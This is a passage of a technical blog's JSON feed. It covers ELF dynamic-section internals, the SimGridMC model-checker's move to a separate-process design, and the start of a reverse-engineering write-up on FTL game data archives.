Another relocation table (.rela.plt section) is used for the PLT.\nIt is located with: DT_JMPREL (address) and DT_PLTRELSZ (byte size\nof the relocation table). The DT_PLTREL gives the type of relocation\ntable (either DT_RELA or DT_REL) used for the PLT.

\n

The DT_PLTGOT is the address of the PLT GOT (.got.plt). The\ndynamic linker needs to know it because the first entries of the PLT\nGOT are used by the dynamic linker.

\n

Symbol lookup

\n

Each relocation implies a symbol lookup.

\n

In ELF, symbol resolution is using a mostly3\nflat-namespace22: a used symbol is not bound to a specific\nDSO and is it searched in all the executable and all DSOs with\nbreadth-first search30 (using the order of the DT_NEEDED entries).

\n

This search is is O(#modules). For each executable or shared-object, a\nhash table (DT_HASH, DT_GNU_HASH or both) is included in the file\n(and available at runtime) in order to speed up the symbol lookup.

\n

Flags

\n

DT_FLAGS is a field of flags:

\n\n

Initialisation and termination functions

\n

Initialisation functions are called in this order:

\n
    \n
  1. \n

    DT_PREINIT_ARRAY array (of byte size DT_PREINIT_ARRAYSZ) of\n preinitialisation function addresses.

    \n
  2. \n
  3. \n

    DT_INIT, address of an initialisation function (the .init\n section);

    \n
  4. \n
  5. \n

    DT_INIT_ARRAY array (of byte size DT_INIT_ARRAYSZ) of\n initialisation function addresses.

    \n
  6. \n
\n

Termination functions are called in this order:

\n
    \n
  1. \n

    DT_FINI_ARRAY array (if byte size DT_FINI_ARRAYSZ) of\n termination function addresses;

    \n
  2. \n
  3. \n

    DT_FINI address of a termination function respectively (.fini\n sections).

    \n
  4. \n
\n

Debug interface

\n

If a DT_DEBUG entry is present, this value will be set by the\ndynamic linker to a pointer to the address of a struct r_debug\n(see link.h):

\n
struct r_debug\n{\n  int r_version;          /* Version number for this protocol. */\n  struct link_map *r_map; /* Head of the chain of loaded objects.  */\n  ElfW(Addr) r_brk;\n  enum {\n    RT_CONSISTENT,        /* Mapping change is complete.  */\n    RT_ADD,               /* Beginning to add a new object.  */\n    RT_DELETE             /* Beginning to remove an object mapping.  */\n  } r_state;\n  ElfW(Addr) r_ldbase;    /* Base address the linker is loaded at.  */\n};\n
\n\n\n

This can be used to traverse the list of executables and\nshared-objects (of a given namespace):

\n
struct link_map {\n  /* These first few members are part of the protocol with the debugger.\n     This is the same format used in SVR4.  */\n  ElfW(Addr) l_addr;          /* Difference between the address in the ELF\n                                 file and the addresses in memory.  */\n  char *l_name;               /* Absolute file name object was found in.  */\n  ElfW(Dyn) *l_ld;            /* Dynamic section of the shared object.  */\n  struct link_map *l_next, *l_prev; /* Chain of loaded objects.  */\n};\n
\n\n\n

The struct link_map can be obtained at runtime with dlinfo(handle,\nRTLD_DI_LINKMAP, &res).

\n

String table

\n

DT_STRTAB and DT_STRSZ give the location and byte size of string\ntable used by the dynamic section (.dynstr);

\n

Symbol versions

\n

Those entries are GNU extensions for versioning of symbol:

\n\n

Not covered (much) here

\n

GNU symbol versioning

\n

Main structures:

\n\n

See the LSB.

\n

TLS

\n

The ELF file contains an initialisation image for the TLS data:

\n\n

See ELF Handling For Thread Local\nStorage.

\n

COMDAT

\n

COMDAT refers to the ability of the static linker to remove redundant\ncode and data when combining different .o files. This is used in C++\nwhen instanciating templates. In order to do this, the compiler\ncreates dedicated sections for each template instanciation.

\n

For example, this C++ code:

\n
#include <string>\n\nstd::string foo(std::string& x)\n{\n  return x + x;\n}\n
\n\n\n

Generates the following sections in the relocatable object:

\n
$ readelf -WS test.o\nThere are 26 section headers, starting at offset 0xc058:\n\nSection Headers:\n  [Nr] Name              Type            Address          Off    Size   ES Flg Lk Inf Al\n  [ 0]                   NULL            0000000000000000 000000 000000 00      0   0  0\n  [ 1] .group            GROUP           0000000000000000 000040 00000c 04     24  18  4\n  [ 2] .text             PROGBITS        0000000000000000 00004c 00002d 00  AX  0   0  1\n  [ 3] .rela.text        RELA            0000000000000000 008278 000018 18   I 24   2  8\n  [ 4] .data             PROGBITS        0000000000000000 000079 000000 00  WA  0   0  1\n  [ 5] .bss              NOBITS          0000000000000000 000079 000000 00  WA  0   0  1\n  [ 6] .text._ZStplIcSt11char_traitsIcESaIcEENSt7__cxx1112basic_stringIT_T0_T1_EERKS8_SA_ PROGBITS        0000000000000000 000079 000062 00 AXG  0   0  1\n  [ 7] .rela.text._ZStplIcSt11char_traitsIcESaIcEENSt7__cxx1112basic_stringIT_T0_T1_EERKS8_SA_ RELA            0000000000000000 008290 000060 18   I 24   6  8\n  [ 8] .gcc_except_table._ZStplIcSt11char_traitsIcESaIcEENSt7__cxx1112basic_stringIT_T0_T1_EERKS8_SA_ PROGBITS        0000000000000000 0000db 000010 00  AG  0   0  1\n[...]\n
\n\n

Section\ngroups\n(sections with .group name and SHT_GROUP type) are used to group\nrelated sections: the first Elf32_Word of the group section is a set\nof flags (GRP_COMDAT is used for COMDAT section groups) and the\nremaining Elf32_Word of the section are the indices of the sections\nbelonging to this group.

\n

ARM

\n\n

References

\n

Authoritative references

\n\n

Blogs posts, articles, books and such

\n\n
\n
\n
    \n
  1. \n

    The address of the GOT entry is 0x200990 and the address of\n.got is 0x200980: the offset of the GOT entry within .got is\n0x200990 - 0x200980 = 0x10 = 16. Each GOT entry is 8 bytes on\nx86_64 so this is the third entry.\u00a0\u21a9

    \n
  2. \n
  3. \n

    GNU objdump and objcopy both rely on\nBFD and are unable to see\nsome sections (and can synthesise some others) because of the\nfile-format abstraction of the BFD library. objdump from\nelfutils (called eu-objdump on some distributions) does not have\nthis limitation (but only has a limited subset of the feature of\nGNU objdump).\u00a0\u21a9

    \n
  4. \n
  5. \n

    Solaris and GNU systems have the ability to handle different\nnamespaces\n(see\ndlmopen()):\ndifferent shared-object can be placed in different namespaces.\nUsually only two namespaces are used: one for the dynamic linker\nand a second one for the the application and the shared-object\nlibraries.\u00a0\u21a9

    \n
  6. \n
  7. \n

    The C structures (and the associated comments) are taken from the\nGNU elf.h file. Only the 64 bit variant is displayed here.\u00a0\u21a9

    \n
  8. \n
  9. \n

    For example, it used used for\nARM-based\nembedded software.\u00a0\u21a9

    \n
  10. \n
  11. \n

    Notable exception are the Apple systems (MacOS X, iOS, Darwin)\nwhich use their own Mach-O format (coming from their NeXTSTEP\nlineage) and Microsoft systems (Windows) which use the PE file\nformat (which is based on the old Unix System V COFF format).\u00a0\u21a9

    \n
  12. \n
  13. \n

    I wrote this tool because objcopy --dump-section was not\ncompletely satisfying.\u00a0\u21a9\u21a9

    \n
  14. \n
  15. \n

    This is an extension to the ELF standard\nnot documented in the specification.\u00a0\u21a9

    \n
  16. \n
  17. \n

    In contrast to PE files, the (readonly) text segment (such as the\ncode) is shared for all processes (and with the filesystem cache)\neven if the shared-object is loaded at different addresses. In\norder to achieve this, the code for shared-objects should be\ncompiled as\nPIC.

    \n

    PE files are built with a preferred address and if they must be\nrelocated, the code becomes private to the process. In other\nwords, Windows DLL do not use PIC.\u00a0\u21a9

    \n
  18. \n
  19. \n

    They are using PIC\n code. They\n must be compiled with cc -fpic (or -fPIC).\u00a0\u21a9

    \n
  20. \n
  21. \n

    They are compiled with cc -fpie (or -fPIE).\u00a0\u21a9

    \n
  22. \n
  23. \n

    With the GNU BFD linker, the layout of sections after linking is\ngiven by a linker\nscript. The\ndefault linker script can be seen with ld -verbose. Another\nlinker script can be used with ld -T some_linker_script.\u00a0\u21a9

    \n
  24. \n
  25. \n

    However they can use other techniques such as GOT\ninfection and ROP.\u00a0\u21a9

    \n
  26. \n
  27. \n

    This property is so important that the\nMPROTECT feature\nof the PaX (an Linux patch) prevents\nthe existence of VMAs which are both executable and writable in\nmost cases in order to enhance security.\u00a0\u21a9

    \n
  28. \n
  29. \n

    In C, symbols have the name of the corresponding C function or\nvariable on ELF systems.

    \n

    In C++, function overloading, templates, namespaces and so on make\nit more difficult. The name of the object (including the types of\nits arguments for functions) is mangled to form the\nsymbol. Different name mangling schemes exist, but modern versions\nof GCC and clang use the name mangling of the C++ Itanium\nABI:\nFor example with this ABI, the foo::Something::bar(int) method\nis mangled into _ZN3foo9Something3barEi. The c++filt program\ncan be used to demangle C++ symbol names (or the __cxa_demangle\nfunction).\u00a0\u21a9

    \n
  30. \n
  31. \n

    The usage of STV_PROTECTED symbols is not recommended because it\nslows down the dynamic\nlinkage.\u00a0\u21a9

    \n
  32. \n
  33. \n

    The usage of the PLT can be disabled at compile-time (for a given\ncompilation unit) with cc -fno-plt or for a given function with\n__attribute__((noplt)). This disables lazy binding.\u00a0\u21a9

    \n
  34. \n
  35. \n

    See GNU Hash ELF\nSection\nby Ali Bahrami and How to write Shared\nLibraries\nby Ulrich Depper.\u00a0\u21a9

    \n
  36. \n
  37. \n

    Each shared-object dependency is described with a DT_NEEDED\nentry. A typical value is libfoo.so.6 (where 6 is a version\nnumber). This file is searched in different directories by the\ndynamic linker. A same shared object can be present in different\nincompatible versions.

    \n

    The link editor ld links against libfoo.so (using the -lfoo\nflag) which is a symbolic link to the current version of the\nshared object. Shared objects usually contain a DT_SONAME entry\ndefining the full (shared-object) name (libfoo.so.6) of this\nshared-object. This value is copied a as DT_NEEDED entry in the\ndependent ELF objects.

    \n

    If no DT_SONAME is present, the link editor creates a\nDT_NEEDED entry with libfoo.so instead when given the -lfoo\nflags.

    \n

    If a full path to the shared object is given to ld and this\nshared object does not have DT_SONAME entry, the full path to\nthe shared object will be used in the DT_NEEDED entry.\u00a0\u21a9

    \n
  38. \n
  39. \n

    DT_RPATH serves the same purpose but is searched before the\nLD_LIBRARY_PATH environment variable which is not considered a\ngood solution. For this reason, the DT_RUNRPATH was created as a\nreplacement: the values of DT_RUNPATH are searched after the\nLD_LIBRARY_PATH environment. DT_RPATH is deprecated and\nignored when DT_RUNPATH is present (and recognised by the\ndynamic linker).\u00a0\u21a9

    \n
  40. \n
  41. \n

    There is no size/number of entries for the symbol table at the\nprogram header table level. This is not needed at runtime as the\nsymbol lookup always go through the hash table.\u00a0\u21a9

    \n
  42. \n
  43. \n

    This is on contrast with Windows PE files and MacOS X which both\nuse a two-level namespace lookup: they import a given symbol from\na given DLL or .dyld.\u00a0\u21a9

    \n
  44. \n
  45. \n

    This means that there is usually no runtime relocation in the text\nsegment: all the runtime relocations are done in the text segment.

    \n

    If the DT_TEXTREL flag is present (or a DT_TEXTREL dynamic\ntable entry) is present, text relocation are present in this\nfile.\u00a0\u21a9

    \n
  46. \n
  47. \n

    The DT_TEXTREL dynamic table entry can be used as well but its\nusage is deprecated/optional.\u00a0\u21a9

    \n
  48. \n
  49. \n

    For relocation sections which apply to a single section, the\nsh_info field is the index of the target section.\u00a0\u21a9

    \n
  50. \n
  51. \n

    The PLT GOT is still vulnerable to GOT\npoisoning.\u00a0\u21a9

    \n
  52. \n
  53. \n

    Static libraries (.a files) are archives to .o\nfiles. Different formats exist for them.\u00a0\u21a9

    \n
  54. \n
  55. \n

    As a result, the sections in the ELF files are grouped in three\nparts:

    \n
      \n
    1. \n

      the sections which belong to the text segment;

      \n
    2. \n
    3. \n

      the sections which belong to the data segment;

      \n
    4. \n
    5. \n

      the sections which do not belong to any segment (and are not\n available/used at runtime).

      \n
    6. \n
    \n

    \u21a9

    \n
  56. \n
  57. \n

    Prelinked DSOs are located at a given (non-null) address in the\nELF file.\u00a0\u21a9

    \n
  58. \n
  59. \n

    This is a simplification. Other things influence the order and the\nset of ELF modules used for a given lookup: DT_SYMBOLIC,\ndlopen(), dlmopen() etc.

    \n

    dlopen-ed shared-object and their dependencies are not added to\nthe global scope but only in a local scope (unless RTLD_GLOBAL\nis used).

    \n

    dlmopen() can be used to create separate symbol namespaces with\ntheir own sets of ELF shared-objects.\u00a0\u21a9

    \n
  60. \n
  61. \n

    The .debug_frame DWARF section is used to tell the debugger how\nto unwind each stack frame

    \n

    The .eh_frame has been created in order to unwind the stack at\nruntime. This is used for exception handling.

    \n

    The .eh_frame section contains information for uwinding the\nframe for each instruction address. This is use by the Itanium C++\nexception ABI to unwind the stack on exceptions. Its format is\nbased on the .debug_frame DWARF section.

    \n

    If it is present the .debug_frame can be omitted.\u00a0\u21a9\u21a9

    \n
  62. \n
  63. \n

    .gnu_debuglink is used to locate an separate file containing\ndebug\ninformations.\nAnother solution is to use a NT_GNU_BUILD_ID note.\u00a0\u21a9

    \n
  64. \n
  65. \n

    .note.gnu.build-id describes the build-id used to locate a\n separate ELF file containing the debug informations. This is the\n NT_GNU_BUILD_ID note.\u00a0\u21a9

    \n
  66. \n
  67. \n

    .gnu.warning and .gnu_warning.XXX contains warning message\ndisplayed by the linker to issue\nwarnings when linking\nagainst this ELF file or this symbol respectively.

    \n

    Example:

    \n

    Hex dump of section '.gnu.warning.gets':\n0x00000000 74686520 60676574 73272066 756e6374 the `gets' funct\n0x00000010 696f6e20 69732064 616e6765 726f7573 ion is dangerous\n0x00000020 20616e64 2073686f 756c6420 6e6f7420  and should not\n0x00000030 62652075 7365642e 00                be used..\n
    \u00a0\u21a9\u21a9\n
  68. \n
  69. \n

    In fact, it creates two GOT sections: .got and .got.plt.\u00a0\u21a9

    \n
  70. \n
  71. \n

    The VMA are the different available/mapped regions in the virtual\naddress space. Each VMA has some properties such as:

    \n
      \n
    • \n

      permissions (rwx);

      \n
    • \n
    • \n

      whether it is shared with other processes (MAP_SHARED) or\n private to this process (MAP_PRIVATE);

      \n
    • \n
    • \n

      whether it has an associated file (and the offset of the VMA\n within the file);

      \n
    • \n
    • \n

      etc.

      \n
    • \n
    \n

    They are created with mmap() (or similar) or directly by the\nkernel. On Linux, they can be seen in /proc/$pid/maps or with\nthe pmap tool.\u00a0\u21a9\u21a9

    \n
  72. \n
  73. \n

    This is what appears in the .o file. In the shared-object or\nexecutable, it is converted to STT_LOCAL and STV_DEFAULT.\u00a0\u21a9

    \n
  74. \n
\n
"}, {"id": "http://www.gabriel.urdhr.fr/2015/09/01/simgrid-mc-rewrite/", "title": "SimGridMC: The Big Split (and Cleanup)", "url": "https://www.gabriel.urdhr.fr/2015/09/01/simgrid-mc-rewrite/", "date_published": "2015-09-01T00:00:00+02:00", "date_modified": "2015-09-01T00:00:00+02:00", "tags": ["computer", "simgrid", "system"], "content_html": "

In my previous SimGrid post, I\ntalked about different solutions for a better isolation between the\nmodel-checked application and the model-checker. We chose to avoid\nthe (hackery) solution based multiple dynamic-linker namespaces in the\nsame process and use a more conventional process-based isolation.

\n

Motivation

\n

In the previous version of the SimGridMC, the model-checker was\nrunning in the same process as the main SimGrid application. We had in\nthe same process:

\n\n

Multiple heaps

\n

In order to do this, the SimGridMC process was using two different\nmalloc()-heaps in the same process in order to separate:

\n
    \n
  1. \n

    the state of the simulated application (processes states and global\n state);

    \n
  2. \n
  3. \n

    the state of the model-checker.

    \n
  4. \n
\n

The model-checker code had a lot of code to select which heap had to\nbe active (and used by malloc() and friends) at a given point of the\ncode.

\n

This is an example of a function with a lot of heap management calls\n(the lines managing the heap swapping are commented with <*>):

\n
void MC_pre_modelcheck_safety()\n{\n\n  int mc_mem_set = (mmalloc_get_current_heap() == mc_heap);  // <*>\n\n  mc_state_t initial_state = NULL;\n  smx_process_t process;\n\n  /* Create the initial state and push it into the exploration stack */\n  if (!mc_mem_set)                                           // <*>\n    MC_SET_MC_HEAP;                                          // <*>\n\n  if (_sg_mc_visited > 0)\n    visited_states = xbt_dynar_new(sizeof(mc_visited_state_t),\n      visited_state_free_voidp);\n\n  initial_state = MC_state_new();\n\n  MC_SET_STD_HEAP;                                           // <*>\n\n  /* Wait for requests (schedules processes) */\n  MC_wait_for_requests();\n\n  MC_SET_MC_HEAP;                                            // <*>\n\n  /* Get an enabled process and insert it in the interleave set\n     of the initial state */\n  xbt_swag_foreach(process, simix_global->process_list) {\n    if (MC_process_is_enabled(process)) {\n      MC_state_interleave_process(initial_state, process);\n      if (mc_reduce_kind != e_mc_reduce_none)\n        break;\n    }\n  }\n\n  xbt_fifo_unshift(mc_stack, initial_state);\n\n  if (!mc_mem_set)                                           // <*>\n    MC_SET_STD_HEAP;                                         // <*>\n}\n
\n\n\n

The heap management code was cumbersome and difficult to maintain: it\nwas necessary to known which function had to be called in each\ncontext, which function was selecting the correct heap and select the\ncurrent heap accordingly. It was moreover necessary to known which\ndata was allocated in which heap. Failing to use the correct heap\ncould lead to errors such as:

\n\n

Goals and solutions

\n

While this design was interesting for the performance of the\nmodel-checker, it was quite difficult to maintain and understand. We\nwanted to create a new version of the model-checker which would be\nsimpler to understand and maintain:

\n\n

In order to avoid the coexistence of the two heaps we envisioned two\npossible solutions:

\n\n

While the dynamic-linker based solution is quite interesting and would\nprovide better performance by avoiding context switches (and who\ndoesn't want to write their own dynamic linker?), it would probably be\ndifficult to achieve and would probably not make the code easier to\nunderstand.

\n

We chose to use the much more standard solution of using different\nprocesses which is conceptually much simpler and provides a better\nisolation between the model-checker and the model-checked application.\nWith this design, the model-checker is a quite standard process: all\ndebugging tools can be used without any problem (Valgrind, GDB) on the\nmodel-checker process. The model-checked process is not completely\nstandard as we are constantly overwriting its state but we can still\nptrace it and use a debugger.

\n

Update (2016-04-01): the model-checker now ptraces the\nmodel-checked application (for various reasons) and it is not possible\nto debug the model-checked application anymore. However, we have a\nfeature to replay an execution of the model-checked application\noutside of the model-checker.

\n

Splitting the model-checker and the simulator

\n

In this new design, the model-checker process behaves somehow like a\ndebugger for the simulated (model-checked) application by monitoring\nand controlling its execution. The model-checker process is\nresponsible for:

\n\n

The simulated application is responsible for:

\n\n

Two mechanisms are used to implement the interaction between the\nmodel-checker process and the model-checked application:

\n\n

Since Linux 3.2, it is possible to read from and write to another\nprocess virtual\nmemory\nwithout ptrace()-ing it: I took care not to use ptrace() in order\nto be able to use it from another purpose (a process can only be\nptraced by a single process at a time):

\n\n

The split has been done in two phases:

\n
    \n
  1. \n

    In the first phase, the split process mode was implemented but the\n single-process mode was still still present and enabled by\n default. This allowed to detect regressions with the single-process\n mode and compare both modes of operations. The resulting code was\n quite ugly because it had to handle both modes of operations.

    \n
  2. \n
  3. \n

    When the split process mode was complete and working correctly, the\n single-process mode was removed and a lot of cleanup could be done.

    \n
  4. \n
\n

Explicit communications

\n

The model-checker process and the model-checked process application\ncommunicate with each other over a UNIX datagram socket. This socket\nis created by the model-checker and passed to the child model-checked\nprocess.

\n

This is used in the initialisation:

\n\n

This is used in runtime to control the execution of the model-checked\napplication:

\n\n

The (simplified) client-loop looks like this:

\n
void MC_client_main_loop(void)\n{\n  while (1) {\n    message_type message;\n    size_t = receive_message(&message);\n    switch(message.type()) {\n\n    // Executes a simcall:\n    case MC_MESSAGE_SIMCALL_HANDLE:\n      execute_transition(message.transition());\n      send_message(MC_MESSAGE_WAITING);\n      break;\n\n    // Execute application code until a visible simcall is reached:\n    case MC_MESSAGE_CONTINUE:\n      execute_application_code();\n      send_message(MC_MESSAGE_WAITING);\n      break;\n\n    // [...] (Other messages here)\n    }    \n  }\n}\n
\n\n\n

Each model-checking algorithm (safety, liveness, communication\ndeterminism) is implemented as model-checker side code which triggers\nexecution of model-checked-side transitions with:

\n
// Execute a simcall (MC_MESSAGE_SIMCALL_HANDLE):\nMC_simcall_handle(req, value);\n\n// Execute simulated application code (MC_MESSAGE_CONTINUE):\nMC_wait_for_requests();\n
\n\n\n

The communication determinism algorithm needs to see the result of\nsome simcalls before triggering the application code:

\n
MC_simcall_handle(req, value);\nMC_handle_comm_pattern(call, req, value, communication_pattern, 0);\nMC_wait_for_requests();\n
\n\n\n

Snapshot/restore

\n

Snapshot and restoration is handled by reading/writing the\nmodel-checked process memory with /prov/$pid/memory. During this\noperation, the model-checked process is waiting for messages on a\nspecial stack dedicated to the simulator (which is not managed by the\nsnapshotting logic). During this time, the model-checked application\nis not supposed to be accessing the simulated application memory.\nWhen this is finished, the model-checker wakes up the simulated\napplication with the MC_MESSAGE_SIMCALL_HANDLE and\nMC_MESSAGE_CONTINUE.

\n

Peeking at the state of the model-checked application

\n

The model-checker needs to read some of the state of the simulator\n(state of the communications, name of the processes and so on).\nCurrently this is handled quite brutally by reading the data directly\nin the structures of the model-checked process (following linked-list\nitems, arrays elements, etc. from the remote process):

\n
// Read the hostname from the MCed process:\nprocess->read_bytes(&host_copy, sizeof(host_copy), remote(p->host));\nint len = host_copy.key_len + 1;\nchar hostname[len];\nprocess->read_bytes(hostname, len, remote(host_copy.key));\ninfo->hostname = mc_model_checker->get_host_name(hostname);\n
\n\n\n

This is quite ugly and should probably be replaced by some more\nstructured way to share this information in the future.

\n

Impact on the user interface

\n

We now have a simgrid-mc executable for the model-checker process.\nIt must be called explicitly by the user in order to use the\nmodel-checker (similarly to gdb or other debugging tools):

\n
# Running the raw application:\n./bugged1\n\n# Running the application in GDB:\ngdb --args ./bugged1\n\n# Running the application in valgrind:\nvalgrind ./bugged1\n\n# Running the application in SimgridMC:\nsimgrid-mc ./bugged1\n
\n\n\n

For SMPI applications, the --wrapper argument of smpirun must be\nused:

\n
# Running the raw application:\nsmpirun \\\n  -hostfile hostfile -platform platform.xml \\\n  --cfg=maxmin/precision:1e-9 --cfg=network/model:SMPI \\\n  --cfg=network/TCP_gamma:4194304 \\\n  -np 4 --cfg=smpi/send_is_detached_thres:0 --cfg=smpi/coll_selector:mpich \\\n  --cfg=contexts/factory:ucontext --cfg=contexts/stack_size:4 \\\n  ./dup\n\n# Running the application in GDB:\nsmpirun -wrapper \"gdb --args\" \\\n  -hostfile hostfile -platform platform.xml \\\n  --cfg=maxmin/precision:1e-9 --cfg=network/model:SMPI \\\n  --cfg=network/TCP_gamma:4194304 \\\n  -np 4 --cfg=smpi/send_is_detached_thres:0 --cfg=smpi/coll_selector:mpich \\\n  --cfg=contexts/factory:ucontext --cfg=contexts/stack_size:4 \\\n  ./dup\n\n# Running the application in valgrind:\nsmpirun -wrapper \"valgrind\" \\\n  -hostfile hostfile -platform platform.xml \\\n  --cfg=maxmin/precision:1e-9 --cfg=network/model:SMPI \\\n  --cfg=network/TCP_gamma:4194304 \\\n  -np 4 --cfg=smpi/send_is_detached_thres:0 --cfg=smpi/coll_selector:mpich \\\n  --cfg=contexts/factory:ucontext --cfg=contexts/stack_size:4 \\\n  ./dup\n\n# Running the application in SimgridMC:\nsmpirun -wrapper \"simgrid-mc\" \\\n  -hostfile hostfile -platform platform.xml \\\n  --cfg=maxmin/precision:1e-9 --cfg=network/model:SMPI \\\n  --cfg=network/TCP_gamma:4194304 \\\n  -np 4 --cfg=smpi/send_is_detached_thres:0 --cfg=smpi/coll_selector:mpich \\\n  --cfg=contexts/factory:ucontext --cfg=contexts/stack_size:4 \\\n  ./dup\n
\n\n\n

Under the hood, simgrid-mc sets a a few environment variable for its\nchild process:

\n\n

Cleanup

\n

After implementing the separate mode, the single process mode has been\nremoved in order to have a cleaner code. In order to have the two\nmode of operations coexist, many functions were checking the mode\noperation and the behaviour was changing depending on the mode. Most\nof this code has been removed and is now much simpler.

\n

The code managing the two heaps is now useless and has been completely\nremoved. We are still using our custom heap implementation in the\nmodel-checked application however: we are using its internal\nrepresentation to track the different allocations in the heap; it is\nused as well in order to clear the bytes of an allocation before\ngiving it to the application. The model-checked application however\nis a quite standard application and uses the standard system heap\nimplementation (or could use another implementation) which is expected\nto have better performance than our implementation.

\n

Currently, it is not quite clear which part of the API are intended to\nbe used by the model-checked process, which part are to be used by the\nmodel-checker process and which parts can be used by both parts. Some\neffort has been used to separate the different parts of the API (by\nmoving them in different header files) but this is is still an ongoing\nprocess. In the future, we might want to have a better organisation\nusing different header files, namespaces and possibly different\nshared-objects for the different parts of the API.

\n

A longer term goal, would be to have a nice API for the model-checker\nwhich could easily be used by the users to write their own\nmodel-checker algorithms (in their own executables). We might even\nwant to export a Lua based binding to write the model-checker\nalgorithms.

\n

Conversion to C++

\n

In parallel, the model-checker code has been ported to C++ and a part\nof it has been rewritten in a more idiomatic C++:

\n\n

All the MC code has been converted to C++ but the conversion to\nidiomatic C++ is still ongoing: some parts of the code are still using\nC idioms.

\n

Performance

\n

This first version is quite slower than the previous one. It was\nexpected that the new implementation would be slower than the previous\none because it uses cross-process communications and the old version\nhad been heavily optimised.\nHowever this might be optimised in the future in order to minimise the\noverhead of cross process synchronisations.

\n

Conclusion

\n

This is a first step towards a cleaner and simpler SimGridMC. The heap\njuggling code has been removed. Instead however, we have some code\nwhich reads directly in the data structures of the other process: this\ncode is not so nice and not so maintainable and we will probably want\nto find a better way to do this.

\n

Some things still need to be done:

\n"}, {"id": "http://www.gabriel.urdhr.fr/2015/08/16/ftl-data/", "title": "FTL data file", "url": "https://www.gabriel.urdhr.fr/2015/08/16/ftl-data/", "date_published": "2015-08-16T00:00:00+02:00", "date_modified": "2015-08-16T00:00:00+02:00", "tags": ["computer", "video-game", "ftl", "reverse-engineering"], "content_html": "

FTL\nis a very nice (and quite difficult)\nrogue-like-ish game with space battles, teleporters, management of the energy of\nyour ship, asteroid fields, alien species, droids (drones), etc.\nIt is quite cheap, DRM-free\nand available natively on Intel-based GNU/Linux.\nThese are notes taken while trying to find out the format of the .dat files of\nthe game containing the game assets, ships statistics, events, etc.\nwhen I had not access to the internet to find the solution.\nThere's a companion C program, ftldat,\nfor extracting the files within the archives and generating archives.\nUnsurprisingly, similar tools\nwith the same name already exists. However, the description of the process\nof reverse-engineering a (very simple) binary format might be interesting for\nsomeone out there.

\n

Trying to see what's in the FTL data files, we find two binary files,\ndata.dat and resource.dat.\nThe latter is quite large and obviously contains the assets of the game.\nThe former is quite small and looking at it, we find interesting structure as\nwell as embedded XML and text files containing the ship statistics and layouts,\nthe tutorial, character names, events, achievements, etc..

\n

Looking at data.dat

\n

file doesn't know what this file is supposed to be:

\n
$ file data.dat\ndata.dat: data\n
\n\n

Looking at the content of this file with less, we find:\n

    \n
  1. the beginning is very regular with what looks like increasing\n sequences of little-endian 32-bit values,\n

    \n             0 1  2 3  4 5  6 7  8 9  a b  c d  e f\n  00000000: 680c 0000 a431 0000 fa37 0000 213b 0000  h....1...7..!;..\n  00000010: 7e41 0000 bb48 0000 a34d 0000 ae51 0000  ~A...H...M...Q..\n  00000020: ac16 0100 af18 0100 1968 0100 b3a0 0100  .........h......\n  00000030: 4fa8 0100 9aae 0100 e5b4 0100 31bb 0100  O...........1...\n  00000040: 87bc 0100 dbc2 0100 f2c4 0100 87cc 0100  ................\n  
    \n
  2. \n

  3. then a lot of zeros,\n

    \n              0 1  2 3  4 5  6 7  8 9  a b  c d  e f\n  000002c0: 0000 0000 0000 0000 0000 0000 0000 0000  ................\n  000002d0: 0000 0000 0000 0000 0000 0000 0000 0000  ................\n  000002e0: 0000 0000 0000 0000 0000 0000 0000 0000  ................\n  000002f0: 0000 0000 0000 0000 0000 0000 0000 0000  ................\n  00000300: 0000 0000 0000 0000 0000 0000 0000 0000  ................\n  00000310: 0000 0000 0000 0000 0000 0000 0000 0000  ................\n  00000320: 0000 0000 0000 0000 0000 0000 0000 0000  ................\n  
    \n
  4. \n

  5. then a lot of (XML and text) files prepended with their file names,\n

    \n            0 1  2 3  4 5  6 7  8 9  a b  c d  e f\n  000031a0: 0000 0000 2f06 0000 1f00 0000 6461 7461  ..../.......data\n  000031b0: 2f6a 656c 6c79 5f63 726f 6973 7361 6e74  /jelly_croissant\n  000031c0: 5f70 6972 6174 652e 786d 6c3c 212d 2d20  _pirate.xml....<\n  
    \n
  6. \n
\n

This looks like an archive of files.

\n

File structure

\n

There is no terminator at the end of the file name so the length of\nthe file name must be stored somewhere else. The length of this file\nname is 31 (0x1f) which is found just a few bytes before the file name.\nApparently the bytes 0x000031a8--0x000031ab are the file name size in\nlittle-endian. The preceding 32 bits are a bigger integer value 0x62f\n(1583) which is probably the file length.

\n

It seems that a file is described by the following structure (in pseudo-C):

\n
struct ftl_file {\n  uint32_t data_size; // Little endian\n  uint32_t name_size; // Little endian\n  char name[name_size];\n  char data[data_size];\n};\n
\n\n\n

We can get the list of the files in the archive with:

\n
strings data.dat | grep ^data | sed 's/\\(\\....\\).*/\\1/'\n
\n\n\n

Which gives:

\n
data/jelly_croissant_pirate.xml\ndata/boss_1_easy.txt\ndata/mantis_scout_pirate.xml\ndata/crystal_cruiser.xml\ndata/jelly_cruiser_2.txt\ndata/kestral.txt\ndata/dlcBlueprintsOverwrite.xml\ndata/rebel_long_pirate.txt\ndata/tutorial.xml\ndata/achievements.xml\ndata/kestral_3.xml\ndata/fed_scout.xml\ndata/rock_scout.xml\ndata/jelly_button_pirate.xml\ndata/rock_scout.txt\ndata/rock_assault.xml\ndata/boss_3_easy.txt\ndata/rebel_long.xml\ndata/names.xml\ndata/dlcAnimations.xml\ndata/anaerobic_cruiser_2.txt\ndata/anaerobic_cruiser.txt\ndata/circle_bomber.xml\ndata/dlcEvents_anaerobic.xml\ndata/energy_bomber_pirate.xml\ndata/crystal_bomber.txt\ndata/dlcPirateBlueprints.xml\ndata/dlcSounds.xml\ndata/blueprints.xml\n[...]\n
\n\n

Header

\n

Now that the role of the structure of the end of the archive is known, the\nfollowing questions remain:

\n
    \n
  1. \n

    What is the role of the beginning of the archive?

    \n
  2. \n
  3. \n

    How are the file structures located inside the archive?

    \n
  4. \n
\n

The first part of the archive is a list of increasing little-endian 32 bit values.

\n

The ftl_file structure for the first file\n(data/jelly_croissant_pirate.xml) is at offset 0x31a04 within the archive.\nIt turns out that this value is the second 32-bit integer in the archive\n(at offset 0x4). Each subsequent offset is the offset of another file structure.

\n

The following zeros are probably unused/empty offset slots.

\n

The only unexplained part of the archive is the meaning of the first 32-bit\nvalue. It does not give the offset of a file structure.\nIt's probably not a magic number because changing the value slightly\ndoes not prevent the game from loading. However using 0 makes the\nprogram crash so it's not useless either.

\n

There are 0x31a0/4=0xc68 offset slots (either used or unused),\n(excluding the first 32-bits value of the file which is not an offset\nwithin the file): this is exactly the value of the first 32 bits. It seems\nthe first 32 bits is the number of offset/file slots.

\n

Summary of the file structure

\n
    \n
  1. \n

    number of offset/file slots (32 bit little-endian);

    \n
  2. \n
